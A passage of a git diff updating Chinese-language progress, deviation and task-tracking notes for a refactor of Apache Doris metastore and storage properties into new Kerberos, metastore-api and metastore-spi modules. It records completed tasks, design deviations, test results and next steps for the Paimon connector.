fe-kerberos**(D-013;fe-foundation/fe-filesystem-api api 纯接口未用→留 spi)。pom 镜像 fe-connector-api(copy-plugin-deps none);注册 fe-connector/pom.xml。**未建 Glue/S3Tables**(留扩展)。`MetaStorePropertiesContractTest` 3/0、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import。 > - **P3a-T01 facts-carrier ✅(commit `51df4fccd01`,D-013)**:新顶层叶子 `fe-kerberos`(**零生产依赖**)facts 切片 `AuthType`(SIMPLE/KERBEROS, `fromString` 仅 "kerberos" 命中余皆 SIMPLE) + `KerberosAuthSpec`(client principal+keytab 不可变值对象, `hasCredentials()` 需两者非空;HMS service principal 不在此=HiveConf override)。6 测绿、checkstyle 0。**authenticator 机制子集(hadoop 依赖 + trino KerberosTicketUtils→JDK)= 待 P2-T02 增量补**。 > - **决策**:D-012(跳过/推迟 P1-T06 docker,验证折进 P2-T05)|D-013(kerberos facts 归 fe-kerberos、先建;metastore-api 依赖 fe-kerberos)。 @@ -52,20 +54,24 @@ ## 当前状态 -- 阶段:Research ✅ / Design ✅(**13 决策 D-001..D-013**)/ **Implement 🚧(P1 storage 5/6 P1-T06 docker 推迟[D-012];P2: 1/5 = P2-T01 ✅;P3a facts-carrier ✅)**。 -- 任务计数 **9/14**(P0: 2/2 ✅ | P1: 5/6,**P1-T06 推迟** | **P2: 1/5(P2-T01 ✅)** | P3a: 0/1,facts-carrier 切片 ✅ 机制待续)| follow-up FU-T01/02/03 ✅| P3b 占位。 -- **新增 2 模块**:顶层叶子 `fe-kerberos`(facts 切片)+ `fe-connector-metastore-api`(5 子接口)。**R-006/R-007/R-008 已闭环**(UT/mutation 层)。 +- 阶段:Research ✅ / Design ✅(**13 决策 D-001..D-013**)/ **Implement 🚧(P1 storage 5/6 P1-T06 docker 推迟[D-012];P2: 2/5 = P2-T01 + P2-T02 ✅;P3a facts-carrier ✅)**。 +- 任务计数 **10/14**(P0: 2/2 ✅ | P1: 5/6,**P1-T06 推迟** | **P2: 2/5(P2-T01 + P2-T02 ✅)** | P3a: 0/1,facts-carrier 切片 ✅ 机制待续[DV-006 推迟到 P3b])| follow-up FU-T01/02/03 ✅| P3b 占位。 +- **新增 3 模块**:顶层叶子 `fe-kerberos`(facts 切片)+ `fe-connector-metastore-api`(5 子接口)+ **`fe-connector-metastore-spi`(5 解析器 + Provider SPI,22 文件)**。**R-006/R-007/R-008 已闭环**(UT/mutation 层)。 - ⚠️ **e2e/docker 全程未跑**(P1 storage 等价 T1 + P2 metastore T2/5-flavor 闸 一并留 P2-T05 docker 跑;D-012)。 -## 下一步(明确):P2-T02(新建 fe-connector-metastore-spi) +## 下一步(明确):P2-T03(paimon adapter 改走共享解析器) > **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手;实施前 WORKFLOW §2 单任务 TDD + 一句话复述。** - -**P2-T02(新建 `fe-connector-metastore-spi`,依赖 metastore-api + fe-foundation + fe-filesystem-api + fe-kerberos)**:5 个 `Hms/Dlf/Rest/Jdbc/FileSystem MetastoreBackend.parse(raw, storageList)`(`@ConnectorProperty` typed holder 绑定,D-004)+ `JdbcDriverSupport` + **`MetaStoreProvider

    ` SPI(`supports(Map)` 自识别 + `bind`)+ 5 内置 provider + 各 `META-INF/services` + `MetaStoreProviders.bind` 派发**(D-006,镜像 `FileSystemProvider`/`FileSystemPluginManager`)。 -- **来源 = 上移 paimon `PaimonCatalogFactory`(631 LOC 手抄)去 fe-core 化**:HiveConf→中立 map、authenticator→`KerberosAuthSpec` facts。**fe-core 旧 `HMSBaseProperties`/`Paimon*MetaStoreProperties` 一律不动**(仍服务 hive/hudi/iceberg)。 -- **此处增量补 fe-kerberos authenticator 机制子集**(hadoop-auth/hadoop-common 依赖 + trino `KerberosTicketUtils`→JDK `javax.security.auth.kerberos` 替换;P3a-T01 续)——`HmsMetastoreBackend` 产出 `KerberosAuthSpec` 需要它。 -- **现场 recon 必做**:①设计 §3.2(权威)+ D-006/D-004;②真实代码 `PaimonCatalogFactory`(`buildHmsHiveConf`:444 / `buildDlfHiveConf` / `resolveDriverUrl` / `validate` / 别名常量 `PaimonConnectorProperties`)= parse 逻辑来源;③`FileSystemPluginManager.bindAll` / `FileSystemProvider` ServiceLoader 样板;④fe-core `HMSBaseProperties.initHadoopAuthenticator`(kerberos 键顺序)+ `PaimonAliyunDLFMetaStoreProperties.buildHiveConf`(DLF 8 键 + endpoint-from-region)作 T2 等价参照(**不动**,只读对照)。 -- **T2 等价性**(设计 §5):`*MetastoreBackend.parse` 产出中立 map == fe-core 旧 `Paimon*MetaStoreProperties`(HiveConf key 集 + ParamRules 报错文案);UT 落地(docker 真闸 P2-T05)。 -- **白名单**:`fe-connector-metastore-spi/**`(§4.1 已列「新建」)+ fe-kerberos/**(机制补充,D-013/§4.1 已加)+ `fe-connector/pom.xml`。 +> ⚠️ **P2-T03 触碰 `fe-connector-paimon/**`(白名单内);这是「cutover」——比 P2-T02「纯新增」风险高,必先对照真实 `PaimonConnector.createCatalog` 流 + 现有 292+ paimon UT 兜底。** + +**P2-T03(`PaimonCatalogFactory`/`PaimonConnector` 改调共享 `MetaStoreProviders.bind(raw, storageHadoopConfig)` 拿 facts + 薄 paimon Options/HiveConf 组装;删手抄 `buildHmsHiveConf`/`buildDlfHiveConf`/`validate`/`PaimonConnectorProperties` 别名数组/`resolveDriverUrl`)**: +- **共享 spi 已就绪**(P2-T02):`MetaStoreProviders.bind(props, storageHadoopConfig)` → `MetaStoreProperties`;连接器 `instanceof HmsMetaStoreProperties/DlfMetaStoreProperties/...` 本地分支组装 paimon SDK catalog(设计 §3.3)。storage 由连接器现有 `PaimonConnector.buildStorageHadoopConfig()`(`ctx.getStorageProperties()→toHadoopConfigurationMap()`)算好喂入(DV-007)。 +- **P2-T02 review 揪出、P2-T03 必接(载于 tasks.md P2-T02 块)**: + 1. **hive.conf.resources base(F2)**:SPI `HmsMetaStoreProperties.toHiveConfOverrides()` **只产 overrides**,不含外部 hive-site.xml base。连接器须 `new HiveConf()` → `ctx.loadHiveConfResources(raw.get("hive.conf.resources")).forEach(hc::set)`(base)→ 再 `toHiveConfOverrides().forEach(hc::set)`(覆盖)。**漏则外部 hive-site.xml 静默丢**。 + 2. **HMS doAs 消费契约**:FE doAs / `executeAuthenticated` 须看 `hms.kerberos()`(非 `getAuthType()`)——HDFS-fallback 时 `getAuthType()==SIMPLE` 但 `kerberos().isPresent()`。 + 3. **driver 注册下移**:P2-T02 只移了纯 `JdbcDriverSupport.resolveDriverUrl`;live `DriverManager.registerDriver`+`DriverShim`+静态 cache(JVM 副作用)仍在 `PaimonConnector`,P2-T03 决定下移与否(连接器调 `resolveDriverUrl` 后注册)。两消费方 `PaimonConnector` + `PaimonScanPlanProvider.getBackendPaimonOptions` 都要改导入。 +- **现场 recon 必做**:①设计 §3.3(adapter 样例,权威);②真实代码 `PaimonConnector.createCatalog`:128-236 / `createCatalogFromContext`(thread-CL pin + `executeAuthenticated`)+ `PaimonCatalogFactory` 现有 `buildCatalogOptions`/`appendXxxOptions`(**SDK 侧,留**);③P2-T02 spi 接口签名(`MetaStoreProviders.bind`、`HmsMetaStoreProperties.toHiveConfOverrides()/kerberos()`、`DlfMetaStoreProperties.toDlfCatalogConf()`、`RestMetaStoreProperties.toRestOptions()`、`JdbcMetaStoreProperties.getXxx()`、`FileSystemMetaStoreProperties.getWarehouse()`)。 +- **T2 等价性**(设计 §5):cutover 后 paimon 5 flavor UT 全绿 + adapter 不再含手抄连接逻辑(行数显著降);真闸 docker P2-T05。 +- **白名单**:`fe-connector-paimon/**` + `fe-connector-metastore-spi/**`(如需微调)+ `fe-connector-paimon/pom.xml`(加 metastore-api/spi 依赖)。**fe-core 旧 `Paimon*MetaStoreProperties` 不动。** ## 未决 / 需注意 - ✅ 已闭环:R-006(FU-T03)、R-007(FU-T01)、R-008(FU-T02)。 @@ -74,7 +80,8 @@ - ⚠️ e2e 全程未跑;P1-T06 前如不部署 docker,明确标「未跑 e2e」(CLAUDE.md Rule 12)。 ## 红线提醒(WORKFLOW §4) -- **可动**(白名单):`fe-connector-paimon/**`、`fe-connector-spi/**`、fe-core **仅** `connector/DefaultConnectorContext.java` + `fs/FileSystemPluginManager.java` + `fs/FileSystemFactory.java`(均**仅新增方法 / 对本项目所加方法的微改+注释**)、**`fe-filesystem/fe-filesystem-hdfs/**`(D-010,FU-T01)**、**`fe-filesystem/fe-filesystem-{s3,oss,cos,obs}/**`(D-011,FU-T02/FU-T03;main+test)**、相关 pom、本跟踪目录。 +- **可动**(白名单):`fe-connector-metastore-api/**` + **`fe-connector-metastore-spi/**`(新建)** + `fe-kerberos/**`(新建叶子)、`fe-connector-paimon/**`、`fe-connector-spi/**`、fe-core **仅** `connector/DefaultConnectorContext.java` + `fs/FileSystemPluginManager.java` + `fs/FileSystemFactory.java`(均**仅新增方法 / 对本项目所加方法的微改+注释**)、**`fe-filesystem/fe-filesystem-hdfs/**`(D-010,FU-T01)**、**`fe-filesystem/fe-filesystem-{s3,oss,cos,obs}/**`(D-011,FU-T02/FU-T03;main+test)**、相关 pom(`fe-connector/pom.xml`/`fe/pom.xml` 仅新增模块声明)、本跟踪目录。 +- **P2-T02 额外触碰**(透明,白名单内):`fe-connector-metastore-api` 的 `MetaStoreProperties.java`/`JdbcMetaStoreProperties.java` 各 1 处 javadoc 诚实订正(`needsStorage` FS 准确性 + `getDriverUrl` raw 语义)——非改契约方法签名。 - **禁碰**:fe-core `datasource.property.{storage,metastore}` 包、构造点 `PluginDrivenExternalCatalog`、其它连接器(hive/hudi/iceberg/es/jdbc/mc/trino)、**其它 fe-filesystem 模块**(`-{api,spi,azure,broker,local}`,含其 test——R-008 若须给 api/spi 加共享 credentials-provider-type 须先 AskUserQuestion)、`fe-property` 模块删除。 - **FU-T01 额外触碰**(已记 D-010 + tasks,透明):fe-core `FileSystemFactory.java`(F1 +1 行 setProperty,项目 P1-T02 加的方法)、`FileSystemPluginManager.java`(bindAll javadoc,项目 P0-T02 加的方法)、fe-connector-paimon `PaimonScanPlanProvider.java`(注释)——均 project-owned 微改/注释,非碰 pre-existing fe-core 方法。 - paimon 连接器 + fe-filesystem-hdfs **允许** import `org.apache.doris.foundation.*`(fe-foundation 叶子)、`org.apache.doris.filesystem.*`;**禁** import fe-core/fe-connector(fe-filesystem 侧 gate)。 @@ -84,3 +91,4 @@ - 设计:[`../designs/metastore-storage-property-refactor-design-2026-06-17.md`](../designs/metastore-storage-property-refactor-design-2026-06-17.md) - 流程:[`WORKFLOW.md`](./WORKFLOW.md) | 任务:[`tasks.md`](./tasks.md) | 决策:[`decisions-log.md`](./decisions-log.md) | 偏差:[`deviations-log.md`](./deviations-log.md) | 风险:[`risks.md`](./risks.md) - 对抗 review(FU-T01):workflow `wf_5db99e32-2ad`(27 agent,4 lens + verify;3 实质修 + F1 接线)|recon:`wf_de5f54be-668`(4-agent:legacy parity / fe-filesystem-hdfs / api+s3 / kerberos) +- **P2-T02**:recon `wf_187e052d-230`(4 reader + synth;证 DV-006/007)|对抗 review `wf_2ddae04d-cf9`(4 lens + verify;REST case-sens MAJOR 修 + 12 测补 + hive.conf.resources/doAs-契约 P2-T03 follow-up) diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index 42977e6ae6026e..ac7c41cb3668a9 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -10,9 +10,9 @@ |---|---|---| | Research(调研) | ██████████ 100% | ✅ 完成(8-agent + grep;+ 3-agent recon 复核 D-006/7/8) | | Design(设计) | ██████████ 100% | ✅ 完成(设计文档 + **7 决策** D-001..D-008,范围已收窄) | -| **Implement(实现)** | ███████░░░ ~50% | 🚧 **进行中**(范围 P0+P1 已获批;P0 ✅;P1 5/6,storage+BE 凭据切 fe-filesystem-api typed + paimon→fe-property 依赖边已断) | +| **Implement(实现)** | ████████░░ ~60% | 🚧 **进行中**(P0 ✅;P1 5/6 P1-T06 推迟[D-012];**P2 2/5 = P2-T01+P2-T02 ✅**;P3a facts 切片 ✅) | -任务计数:**7 / 14** 完成(P0: 2/2 ✅ | P1: 5/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b / FU-T01 / FU-T02**(follow-up,范围外占位)。仅剩 **P1-T06**(验证)即 P1 收口。 +任务计数:**10 / 14** 完成(P0: 2/2 ✅ | P1: 5/6,**P1-T06 推迟** | **P2: 2/5(P2-T01 + P2-T02 ✅)** | P3a: facts 切片 ✅ 机制待续)| + FU-T01/02/03 ✅、P3b 占位。**下一步 = P2-T03**(paimon adapter 改走共享解析器)。 --- @@ -29,7 +29,8 @@ - P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|P1-T02 ✅(getStorageProperties 实现 + FileSystemFactory accessor)|P1-T03 ✅(paimon storage 配置 `applyStorageConfig` 改走 `toHadoopConfigurationMap()`)|P1-T04 ✅(paimon BE 静态凭据改走 `getStorageProperties().toBackendProperties().toMap()`,全量切)|**P1-T05 ✅**(删 paimon→fe-property pom 依赖边 + grep 归零闸)。 - ✅ **连接器 storage + BE 凭据路全切 fe-filesystem-api typed,且 paimon→fe-property 依赖边已断**:catalog 路 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`;BE 扫描分片路 `PaimonScanPlanProvider` 遍历 `getStorageProperties()→toBackendProperties().toMap()`→`location.*`(vended overlays static 保序不动)。paimon 已零 `org.apache.doris.property/datasource` import + pom 无 fe-property 依赖(fe-property 变 0 消费者孤儿,本次不物理删 D-005)。 - ⚠️ **已知接受回归(fe-filesystem typed BE model 不全,超 P1 白名单)**:HDFS-warehouse paimon BE 配置丢(DV-004/R-007/FU-T01);无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(R-008/FU-T02)。均用户接受、follow-up 修、docker P1-T06 会暴露(非新 bug)。 -- ▶ **下一步**:**P2-T02**(新建 fe-connector-metastore-spi:解析器 + MetaStoreProvider SPI/ServiceLoader + 增量补 fe-kerberos authenticator 机制)。**P3a-T01 facts-carrier ✅ + P2-T01 ✅**(2026-06-18)。**P1-T06 推迟**(D-012,docker 验证折进 P2-T05 一次跑)。 +- **P2-T02 ✅(2026-06-18,commit 待提交)**:新建 `fe-connector-metastore-spi`(22 文件)= 5 后端 `*MetaStorePropertiesImpl`(`@ConnectorProperty` 绑定)+ `MetaStoreProvider` SPI/ServiceLoader first-hit 派发 + `MetaStoreParseUtils`/`JdbcDriverSupport`/`AbstractMetaStoreProperties`;**DV-006**(fe-kerberos 零新代码,facts-only)+ **DV-007**(storage = 中立 Map,模块 hadoop/fs-free)。spi 41/0、checkstyle 0、import-gate 0、3 mutation 证、对抗 review `wf_2ddae04d-cf9`(0 BLOCKER,REST case-sens MAJOR 已修,+12 测)。⚠️ docker 未跑。 +- ▶ **下一步**:**P2-T03**(paimon `PaimonCatalogFactory` adapter 改走共享 `MetaStoreProviders.bind`,删手抄连接逻辑;**必接 review 揪出的 hive.conf.resources base + kerberos() doAs 消费契约 + driver 注册下移**,见 tasks P2-T02 块)。**P1-T06 推迟**(D-012,docker 折进 P2-T05)。 ## 阻塞 / 待决 - ✅ 范围已获批(2026-06-17)= **P0+P1(storage 收口),做到 P1-T06 gate 停**。 @@ -39,6 +40,7 @@ --- ## 最近动态(最近 7 天) +- 2026-06-18 **P2-T02 ✅(新建 fe-connector-metastore-spi,commit 待提交)**:recon workflow `wf_187e052d-230`(4 reader+synth,证两 deviation)+ 直接核实 → 3 边界经 AskUserQuestion 定(**DV-006** fe-kerberos compile-dep-only 零新代码、**DV-007** storage 中立 Map 模块 hadoop/fs-free、全 5 后端一次 commit)。建 22 文件:`MetaStoreProvider` SPI + `MetaStoreProviders` first-hit ServiceLoader 派发 + `MetaStoreParseUtils` + `JdbcDriverSupport.resolveDriverUrl`(纯 resolver;注册留 P2-T03)+ `AbstractMetaStoreProperties` + 5 `*Impl`(`@ConnectorProperty`,消灭手抄别名)+ 5 provider(`sensitivePropertyKeys` 暴露 sensitive 键)+ 单 services 文件。来源=上移 paimon `PaimonCatalogFactory` 手抄逻辑去 fe-core 化(HiveConf→中立 Map、authenticator→`KerberosAuthSpec` facts)。**HMS D-4 补回** forbidIf-simple/requireIf-kerberos(CASE-SENSITIVE `Objects.equals` 对齐 ParamRules,保留与 conf-build `equalsIgnoreCase` 的不对称)。验证 spi **41/0**、checkstyle 0、import-gate 0、**3 mutation 证**(RED→GREEN)。**对抗 review `wf_2ddae04d-cf9`(4 lens+verify)**:0 BLOCKER;1 真 MAJOR=**REST token-provider `equalsIgnoreCase`→`"dlf".equals`**(paimon 手抄 latent bug,legacy ParamRules 权威)已修;FS `supports()` 去 trim 不对称 + 对齐 legacy;DV-006/007/D-006/D-4 独立核实正确;trim/accessPublic-proxyMode 经核证对齐权威 legacy contract(不改);补 12 测覆盖缺口。**API 旁改 2 javadoc**(诚实订正,白名单内)。**下一步 P2-T03**(必接 hive.conf.resources base + kerberos() doAs 契约 + driver 注册下移)。⚠️ docker 未跑(T2 真闸 P2-T05)。 - 2026-06-18 **进入 P2(metastore SPI):P3a-T01 facts-carrier ✅ + P2-T01 ✅**(D-012 跳过/推迟 P1-T06 docker;D-013 用户选 fe-kerberos 先建)。**P3a-T01 facts 切片**(commit `51df4fccd01`)新建顶层叶子 `fe-kerberos`(零依赖)= `AuthType`(SIMPLE/KERBEROS, fromString 仅 "kerberos" 命中) + `KerberosAuthSpec`(principal/keytab 不可变值对象, hasCredentials 需两者);6 测绿、checkstyle 0。**P2-T01**(本次 commit)新建 `fe-connector-metastore-api`:`MetaStoreProperties`(providerName + needsStorage/needsVendedCredentials 默认 false + validate no-op + raw/matched,**无 MetaStoreType 枚举** D-006)+ HMS/DLF/REST/JDBC/FileSystem 5 子接口(中立 Map/标量;HMS 经 fe-kerberos `AuthType`/`Optional`);依赖仅 fe-kerberos(D-013;fe-foundation/fe-filesystem-api 留 spi 用时再加);契约测试 3/0、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import。未建 Glue/S3Tables(留扩展)。⚠️ docker 全程未跑(留 P2-T05)。**下一步 P2-T02**。 - 2026-06-18 **FU-T02 ✅ + FU-T03 ✅**(D-011,P1-T06 前补齐 fe-filesystem 对象存储;R-008 + R-006 闭环):**FU-T02**(commit `e5b088b14e7`)`Oss/Cos/ObsFileSystemProperties.toBackendKv()` 内联镜像 legacy `AbstractS3CompatibleProperties` 基类条件(ak/sk 皆空发 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`、否则省略);**DV-005** 不加字段/枚举(legacy OSS/COS/OBS 无可配置 provider type、`S3CredentialsProviderType` 在 s3 模块不可达,加字段反更不贴 legacy + 须扩白名单)——比原 D-011「加字段镜像 S3」更简更贴 legacy(用户本轮指令「处理逻辑一致」)。TDD RED→GREEN(3 ANONYMOUS 测 + 3 有凭据 assertNull 守省略)。**FU-T03** 4 个 `*PropertiesTest` 加调优默认守护(BE+Hadoop map,字面量期望值;S3 50/3000/1000、OSS/COS/OBS 100/10000/10000,已核 legacy `S3Properties.Env`/`OSS|COS|OBSProperties` parity);mutation 改 4 个 `DEFAULT_MAX_CONNECTIONS`→4 测全红证守护。验证:S3 15/0·OSS 14/0·COS 13/0·OBS 13/0 + 全 sibling suite 绿、checkstyle 0×4、`git diff` 白名单干净。⚠️ docker e2e 未跑(真闸 P1-T06)。**下一步 P1-T06**(R-006/7/8 全闭环 → 干净全绿验收)。 - 2026-06-17 **FU-T01 ✅**(D-010 授权,HDFS typed BE model 修 DV-004/R-007):新建 `fe-filesystem-hdfs` 的 `HdfsFileSystemProperties`(BE-only,忠实移植 legacy `initBackendConfigProperties`)+ `HdfsConfigFileLoader`(XML 资源)+ provider `bind()`/`create(P)`(`create(Map)`/`supports()` 不动)+ pom `fe-foundation`/`commons-lang3`。kerberos=**K1**(BE-key 字符串内联,不建 fe-kerberos,不碰 create()-side authenticator;用户 AskUserQuestion 选)。**真 parity 在 UT 落地**(非 paimon Option C):25 golden parity 钉 `toMap()`==legacy BE 键集(simple/kerberos/HA/username/uri-derive/XML/sysprop…)。验证 fe-filesystem-hdfs **78/0** + checkstyle 0 + RED/GREEN(mutation 关 kerberos 块→红) + fe-core `-am compile` 绿 + `git diff` 白名单干净。**对抗 review `wf_5db99e32-2ad`(27 agent,4 lens+verify)**:清场(packaging 无跨 loader、parity byte-level 复核、BE-only 无新 catalog 路回归、强 oss-hdfs 断言被 verify 推翻),3 实质修(①malformed-uri swallow→fail-loud 对齐 legacy;②2 处 stale 注释[bindAll javadoc/paimon KNOWN GAP 1];③+11 测试)。**F1**(XML config-dir 未接 `Config.hadoop_config_dir`)用户选「**现在接好**」=fe-core `FileSystemFactory` setProperty 桥(leaf 读 sysprop)。**额外触碰 3 已白名单文件**(FileSystemFactory/FileSystemPluginManager/PaimonScanPlanProvider,均 project-owned 微改/注释)。残留 oss-hdfs JindoFS 凭据=独立 FU。⚠️ docker e2e 未跑(HA/kerberized 真闸 P1-T06)。 diff --git a/plan-doc/metastore-storage-refactor/deviations-log.md b/plan-doc/metastore-storage-refactor/deviations-log.md index fc511a27e331c1..e50cbe01de7458 100644 --- a/plan-doc/metastore-storage-refactor/deviations-log.md +++ b/plan-doc/metastore-storage-refactor/deviations-log.md @@ -6,6 +6,21 @@ --- +## DV-007 — P2-T02 共享 parser 的 storage 入参用中立 `Map storageHadoopConfig`,**不**用 `List`;spi 不依赖 fe-filesystem-api +- **日期**:2026-06-18 | **原计划位置**:设计 §3.2(`*MetastoreBackend.parse(Map raw, List storage)`)/ tasks `P2-T02` header(「依赖 metastore-api + fe-foundation + **fe-filesystem-api**」)/ WORKFLOW §4.2(「新模块 metastore-api/spi 只可依赖 fe-foundation + fe-filesystem-api」)。 +- **为何偏差(recon + 用户定夺 AskUserQuestion)**:recon(report A §6 / report D §4)证:①paimon 现有 up-move 源(`buildHmsHiveConf`/`buildDlfHiveConf`)已经吃**预算好的中立 `Map storageHadoopConfig`**(由 `PaimonConnector.buildStorageHadoopConfig` 从 `ctx.getStorageProperties().toHadoopProperties().toHadoopConfigurationMap()` 合并),**不**在 parser 内迭代 `StorageProperties`;②metastore-api 契约只在 javadoc 提 `StorageProperties`、签名零引用 → spi 用中立 Map 即可保持 **hadoop/fs-free**(零 fe-filesystem-api 依赖,最小化模块依赖面 + 无 classloader 面)。**关键不变量保持**:storage 叠加保序 + kerberos-在-storage-之后 由 **parser 拥有**(parser 收 storageHadoopConfig,在 `toHiveConfOverrides()`/`toDlfCatalogConf()` 内部按序 overlay)。 +- **新方案(用户 2026-06-18 选「Neutral Map」)**:`MetaStoreProvider.bind(Map props, Map storageHadoopConfig)` + `MetaStoreProviders.bind(raw, storageHadoopConfig)`;spi pom **不**含 fe-filesystem-api。P2-T03 paimon adapter 把现有 `buildStorageHadoopConfig()` 产物喂进来(连接器侧仍调 `ctx.getStorageProperties()`,是 ctx SPI 调用,本就连接器侧)。**被否**:`List`(设计字面,typed 边界,但引入 fe-filesystem-api 依赖 + parser 重复 `toHadoopConfigurationMap` 迭代,对 P2-T02 无收益——storage 已在连接器算好)。 +- **影响范围**:spi pom 依赖集(−fe-filesystem-api);parse 签名(storage = Map 非 List);设计 §3.2 待加(DV-007 修订)脚注;WORKFLOW §4.2 spi 允许依赖集实际为 metastore-api + fe-foundation + fe-extension-spi + fe-kerberos(fe-filesystem-api 未用)。不影响 P2-T03 之后若需 typed 边界再加。 + +## DV-006 — P2-T02 不在 fe-kerberos 增量补 hadoop authenticator 机制子集(HANDOFF/task 原写「此处增量补」被证伪);fe-kerberos 仅作 compile 依赖、零新代码 +- **日期**:2026-06-18 | **原计划位置**:HANDOFF「下一步 P2-T02」+ tasks `P2-T02` 原 header(「**此处增量补 fe-kerberos authenticator 机制子集**[hadoop-auth/hadoop-common 依赖 + trino `KerberosTicketUtils`→JDK 替换]——`HmsMetastoreBackend` 产出 `KerberosAuthSpec` 需要它」)/ P3a-T01 续;设计 §3.5 步骤 a。 +- **为何偏差(recon 三重取证 + 直接核实真实代码)**:HANDOFF 断言「产出 `KerberosAuthSpec` 需要 authenticator 机制」**证伪**—— + 1. `KerberosAuthSpec`(commit `51df4fccd01`)是**两 String 不可变值对象**(`KerberosAuthSpec.java:28-29` 明示零 hadoop 类型/不登录);产出它 = `new KerberosAuthSpec(clientPrincipal, clientKeytab)`,`AuthType.fromString(...)` 纯函数(`AuthType.java:52-57`)。**纯 String→值对象,零 hadoop**。 + 2. paimon 连接器 parse-time 只把 kerberos 键当**普通字符串**塞进 HiveConf(`PaimonCatalogFactory.java:438-440` 注释明示「legacy additionally built a HadoopAuthenticator from them;这里只携带 auth keys」`:465-470,:489-513`),自身**从不**构造 UGI/authenticator。 + 3. 真正的 `UGI.doAs` 机制由 **FE 侧**构建、**storage-derived**:`DefaultConnectorContext.executeAuthenticated`→`authSupplier.get().execute(task)`(`:136-138`),authenticator 来自 `PluginDrivenExternalCatalog:136-137`(storage props 建 `HadoopExecutionAuthenticator`);全部 UGI 机器(`HadoopKerberosAuthenticator`/`UserGroupInformation`/`Krb5LoginModule`)在 **fe-common**(已带 hadoop classpath)。fe-kerberos 不参与 doAs。 +- **新方案(用户 2026-06-18 选「Compile-dep only」)**:fe-kerberos **零新代码**(仅作 spi 的 compile 依赖,且经 metastore-api 已 transitive);HMS parser 产出 `getAuthType()`(`AuthType.fromString`) + `kerberos()`(`Optional.of(new KerberosAuthSpec(clientPrincipal, clientKeytab))`) + `toHiveConfOverrides()`(中立 String 键含 service principal/auth_to_local/sasl/auth=kerberos)。`fe-kerberos/pom.xml:36-38` 注的「authenticator 机制子集(D-013)增量补」推迟到**真把 FE 侧 doAs 从 fe-common 搬进 fe-kerberos** 的后续 cutover(P3b 同批),**非** P2-T02。**被否**:照 HANDOFF 字面把 hadoop-auth/hadoop-common + trino→JDK 替换搬进 fe-kerberos(speculative、parse-time 用不上、Rule 2 违反)。 +- **影响范围**:fe-kerberos **不改**(白名单 `fe/fe-kerberos/**` 本 task 不触碰);P3a-T01「authenticator 机制待续」状态不变(仍待 P3b);设计 §3.5 步骤 a 待加(DV-006 修订)脚注;不影响 T2 parity(`toHiveConfOverrides()` 串键 == legacy `HMSBaseProperties` 串键)。 + ## DV-005 — FU-T02 不新增 `credentialsProviderType` 字段(镜像 S3 的写法),改为内联镜像 legacy 基类条件 - **日期**:2026-06-18 | **原计划位置**:task `FU-T02` / D-011(「给 `Oss/Cos/ObsFileSystemProperties` 加 `credentialsProviderType` 字段(镜像 `S3FileSystemProperties`)」)。 - **为何不可行/不必要**:现场 recon(对照 `fe-core .../datasource/property/storage`)证伪「镜像 S3 字段」是正确做法—— diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index ec91ae57765c6d..bf4d7184f2c41a 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -87,10 +87,15 @@ - **验收**:模块编译;接口签名对齐设计 §3.1(**确认无 `MetaStoreType` 枚举**);新模块声明进 `fe-connector/pom.xml`。 - **依赖**:~~无~~ **fe-kerberos(D-013,P3a-T01 facts-carrier 先建)**。设计 §4 P2-1 / §3.1 / **D-006 / D-013**。 -### P2-T02 ⬜ 新建 fe-connector-metastore-spi(共享后端解析器 + Provider 发现) -- **做什么**:新模块(依赖 metastore-api + fe-foundation + fe-filesystem-api):`Hms/Dlf/Rest/Jdbc/FileSystem MetastoreBackend.parse(raw, storageList)` + `JdbcDriverSupport` + `@ConnectorProperty` typed holders;**+ `MetaStoreProvider

    ` SPI(`supports(Map)` 自识别 + `bind`)+ 5 个内置 provider + 各自 `META-INF/services` + `MetaStoreProviders.bind(...)` 派发**(D-006,镜像 `FileSystemProvider`/`FileSystemPluginManager`)。来源 = 上移 paimon 现有 `PaimonCatalogFactory` 手抄逻辑(去 fe-core 化)。**fe-core 旧类不动**。 -- **验收**:T2 等价性测试通过(解析产物 == 旧 `Paimon*MetaStoreProperties`);`@ConnectorProperty` 别名/required/sensitive 生效;`MetaStoreProviders.bind` 经 `supports()` 正确选中 5 后端(**无 per-backend 枚举/中心 switch**)。 -- **依赖**:P2-T01。设计 §4 P2-2 / §3.2 / §5 T2 / **D-006**。 +### P2-T02 ✅(2026-06-18 完成,commit 待提交)新建 fe-connector-metastore-spi(共享后端解析器 + Provider 发现) +- **完成态(2026-06-18,commit 待提交)**:新模块 `fe-connector-metastore-spi`(15 main + 7 test = 22 文件)= `MetaStoreProvider

    ` SPI(`supports(Map)` 自识别 + abstract `bind(props, storageHadoopConfig)`,extends `PluginFactory`)+ `MetaStoreProviders.bind` first-hit 派发(ServiceLoader)+ `MetaStoreParseUtils`(firstNonBlank/copyIfPresent/nullToEmpty/applyStorageConfig/matchedProperties + `CATALOG_TYPE_KEY`/`FS_S3A_PREFIX`/`USER_STORAGE_PREFIXES`)+ `JdbcDriverSupport.resolveDriverUrl`(仅纯 resolver)+ `AbstractMetaStoreProperties`(共享 raw/warehouse/matchedProperties)+ 5 `*MetaStorePropertiesImpl`(`@ConnectorProperty` 绑定,消灭手抄别名数组)+ 5 provider(各 `sensitivePropertyKeys` override 暴露 sensitive 键,镜像 FS)+ 单 `META-INF/services` 文件(5 行)。pom 依赖 = metastore-api + fe-extension-spi + fe-foundation + fe-kerberos + commons-lang3(**无** fe-filesystem-api[DV-007]、无 hadoop/hive/thrift);copy-plugin-deps phase=none;注册进 `fe-connector/pom.xml`。**HMS parity gap D-4 补回**(forbidIf-simple/requireIf-kerberos,CASE-SENSITIVE `Objects.equals` 对齐 ParamRules,与 conf-build branch 